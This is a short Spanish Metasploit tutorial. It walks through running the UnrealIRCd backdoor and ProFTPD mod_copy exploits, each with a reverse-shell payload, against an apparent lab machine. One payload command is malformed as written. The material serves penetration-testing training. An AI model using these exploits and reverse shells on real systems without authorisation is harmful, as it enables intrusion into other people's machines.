Nivel básico


Vamos a hacer uso del reporte generado con Nessus.

images/112-1.png

Para visualizar las opciones de msfconsole:

images/112-2.png

Tiene muchas opciones aunque lo más optimo es centrarse en las core.

Una de las utilidades, una de las herramientas que viene incorporadas en el framework es la herramienta Connect, es algo similar y análogo a Netcat.


connect 192.xxx.xxx.xxx 5555

Para buscar exploits podemos usar:


search unrealirc

images/112-3.png

Para utilizarlo:


use exploit/unix/irc/unreal_ircd_3281_backdoor

images/112-4.png

Para ir hacia atrás:


back

Para configurar opciones del exploit:


show options

images/112-5.png


show advanced

images/112-6.png

Seleccionar host de la máquina objetivo


set rhosts 192.168.20.128

Seleccionar el payload:


show payloads
set payload payload/cmd/unix/reverse

images/112-7.png

images/112-8.png

Configurar el payload:


set lhost 192.168.20.131

images/112-9.png

Ejecutar exploit:


exploit

images/112-10.png

Probamos otra vulnerabilidad:


search proftpd

images/112-11.png


use exploit/unix/ftp/proftpd_modcopy_exec
show options

images/112-12.png


set rhosts 192.168.20.128
show payloads
set payload/cmd/unix/reverse_perl

images/112-13.png


set lhost 192.168.20.131
exploit

images/112-14.png